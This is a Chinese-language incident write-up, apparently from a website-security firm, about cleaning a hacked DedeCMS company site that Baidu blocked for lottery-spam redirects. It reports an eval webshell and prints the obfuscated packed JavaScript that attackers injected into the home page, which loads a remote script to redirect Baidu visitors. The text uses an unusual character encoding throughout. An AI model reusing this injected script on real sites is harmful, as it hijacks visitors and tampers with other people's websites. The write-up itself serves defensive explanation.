客戶(hù)剛從公司下班回家，接到領(lǐng)導(dǎo)的電話說(shuō)是網(wǎng)站在百度怎么打不開(kāi)了，客戶(hù)時(shí)間用手機(jī)訪問(wèn)網(wǎng)站，發(fā)現(xiàn)網(wǎng)站正常，隨后又用百度去搜索公司網(wǎng)站域名，發(fā)現(xiàn)網(wǎng)站竟然被百度網(wǎng)址安全中心攔截了并提示：違法違規(guī)網(wǎng)頁(yè)，建議關(guān)閉,您訪問(wèn)的是：//公司域名，此網(wǎng)頁(yè)可能為違法違規(guī)網(wǎng)頁(yè)，包含非法信息以及不健康內(nèi)容，請(qǐng)謹(jǐn)慎訪問(wèn)。如下圖所示：

整個(gè)客戶(hù)公司的網(wǎng)站在百度無(wú)法打開(kāi)，的被百度攔截掉了，百度提示的肯定是有原因的，我們晉城龍鼎網(wǎng)絡(luò)服務(wù)有限公司工程師通過(guò)百度搜索發(fā)現(xiàn)，網(wǎng)站在搜索結(jié)果里被標(biāo)注了：

百度網(wǎng)址安全中心提醒您：該站點(diǎn)可能受到黑客攻擊，部分頁(yè)面已被非法篡改！下圖所示：

點(diǎn)擊去后，彈出百度的攔截頁(yè)面，提示：該站點(diǎn)可能由于受到黑客攻擊，部分頁(yè)面已被非法篡改，可能會(huì)威脅到您的財(cái)產(chǎn)和信息安全，建議您謹(jǐn)慎訪問(wèn)。我們處理了太多像這種情況的網(wǎng)站了，我們打開(kāi)百度網(wǎng)址安全中/掃描看一下是什么原因?qū)е戮W(wǎng)站被百度攔截，輸入客戶(hù)公司網(wǎng)址點(diǎn)查詢(xún)，發(fā)現(xiàn)網(wǎng)站被標(biāo)記危險(xiǎn)，并提示：危險(xiǎn)，網(wǎng)站網(wǎng)頁(yè)中含有惡意信息！

這說(shuō)明網(wǎng)站里含有惡意內(nèi)容的信息被百度檢測(cè)到了，但是百度并沒(méi)有指出到底是哪個(gè)網(wǎng)站頁(yè)面存在惡意信息，看到百度旗下還有個(gè)百度云觀測(cè)的產(chǎn)品，注冊(cè)免費(fèi)使用，檢測(cè)網(wǎng)站的安全情況，沒(méi)有檢測(cè)到網(wǎng)站出現(xiàn)安全問(wèn)題。到底含有惡意內(nèi)容的信息在哪里？該怎么查找，根據(jù)我們SINE安全多年的經(jīng)驗(yàn)，通過(guò)百度的工具以及發(fā)送郵件，申訴等通道是獲取不到具體的惡意信息鏈接，百度只是官方的回復(fù)一下，具體問(wèn)題的根源在哪里，得自己動(dòng)手去查找代碼，以及公司網(wǎng)站在百度的收錄情況。

發(fā)現(xiàn)了問(wèn)題，客戶(hù)公司網(wǎng)站在百度的快照內(nèi)容被篡改了，是一些彩piao內(nèi)容，既然已經(jīng)知道網(wǎng)站里含有惡意信息。那就從網(wǎng)站代碼開(kāi)始入手，客戶(hù)網(wǎng)站使用的是開(kāi)源的dedecms織夢(mèng)系統(tǒng)，php+mysql數(shù)據(jù)庫(kù)，從服務(wù)器壓縮了一份，下載到本地的電腦，開(kāi)始檢查源代碼，每一行，每一個(gè)代碼都不要放過(guò)，對(duì)比客戶(hù)之前網(wǎng)站備份代碼，發(fā)現(xiàn)plus下的search.php被篡改了，多出來(lái)一些eval一句話木馬代碼，也叫webshell.

客戶(hù)的網(wǎng)站首頁(yè)文件index.html也被篡改添加了代碼，尤其標(biāo)題描述都被篡改了，從百度里搜索點(diǎn)擊到客戶(hù)公司網(wǎng)站，自動(dòng)跳轉(zhuǎn)到了彩piao網(wǎng)站上去了。這跟index.html被篡改是對(duì)應(yīng)的，我們晉城龍鼎網(wǎng)絡(luò)服務(wù)有限公司貼出代碼讓大家看一下：

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(par

seInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,St

ring)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=

1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\k\\a\\1\

\m\\9\\7\\o\\0"]["\\n\\4\\8\\0\\7"](\'\\e\\2\\1\\4\\8\\5\\0\\0\\i\\5\\7\\c\\6\\0\\7\\j\\0\\3\\f\\b\\u\\b\\2\

\1\\4\\8\\5\\0\\6 \\2\\4\\1\\c\\6\\t\\0\\0\\5\\w\\3\\3\\v\\q\\p\\s\\r\\h\\1\\a\\9\\3\\g\\g\\h\\f\\2\\6\\d\\

e\\3\\2\\1\\4\\8\\5\\0\\d\');',33,33,'x74|x63|x73|x2f|x72|x70|x22|x65|x69|x6d|x6f|x61|x3d|x3e|

x3c|x6a|x31|x2e|x79|x78|x64|window|x75|x77|x6e|x38|x37|x71|x7a|x68|x76|

x35|x3a'.split('|'),0,{}))</script>

這種掛馬代碼功能是：對(duì)百度來(lái)的點(diǎn)擊，進(jìn)行判斷并跳轉(zhuǎn)到攻擊者設(shè)定的域名，如果是直接輸入網(wǎng)站域名是不會(huì)跳轉(zhuǎn)。如果對(duì)代碼不是太懂的話，根本無(wú)法理解這段代碼的意思。問(wèn)題找到了，那就開(kāi)始著手處理，刪除首頁(yè)的惡意代碼，恢復(fù)網(wǎng)站的正常訪問(wèn)，刪除攻擊者留下的webshell網(wǎng)站木馬后門(mén)文件，并對(duì)客戶(hù)網(wǎng)站代碼進(jìn)行全面的網(wǎng)站安全檢測(cè)，包括網(wǎng)站漏洞檢測(cè)，發(fā)現(xiàn)客戶(hù)使用的是早期版本的dedecms，存在遠(yuǎn)程代碼執(zhí)行漏洞，可以上傳任意文件的文件上傳漏洞。我們SINE安全對(duì)其代碼做了漏洞修復(fù)，對(duì)上傳做了后綴名的安全過(guò)濾與限制，對(duì)文件上傳的目錄做了安全部署，防止PHP腳本文件的執(zhí)行與寫(xiě)入。對(duì)網(wǎng)站進(jìn)行了整體的安全加固與防護(hù)，防止攻擊者繼續(xù)篡改網(wǎng)站，有些客戶(hù)網(wǎng)站以為只是刪除首頁(yè)那部分惡意代碼就能解決問(wèn)題，大錯(cuò)特錯(cuò)，問(wèn)題的根源不是刪除，而是網(wǎng)站存在漏洞，只是刪除惡意代碼其實(shí)就是亡羊補(bǔ)牢，要從根源入手，修復(fù)網(wǎng)站的漏洞。才能的解決百度的攔截問(wèn)題，百度會(huì)定期對(duì)網(wǎng)站進(jìn)行安全監(jiān)控，如果多次出現(xiàn)被篡改的情況，會(huì)直接將您網(wǎng)站拉入黑名單，長(zhǎng)時(shí)間的對(duì)網(wǎng)站進(jìn)行攔截。

至此客戶(hù)網(wǎng)站才得以安全，的刪除了惡意信息跟惡意的代碼，通過(guò)百度網(wǎng)址安全中心的在線提交申訴，等待百度的人工審核，在申訴后的三天，收到了百度網(wǎng)址安全中心的回復(fù)，百度網(wǎng)址安全技術(shù)人員答復(fù)如下：你好，對(duì)于//公司網(wǎng)站域名的檢測(cè)結(jié)果為：通過(guò)審核，到此網(wǎng)站被百度網(wǎng)址安全中心的攔截，解封，客戶(hù)公司網(wǎng)站恢復(fù)正常訪問(wèn)，我們將損失給客戶(hù)降到了低，將客戶(hù)的事當(dāng)成自己的事來(lái)做，我們的路才能走的更寬。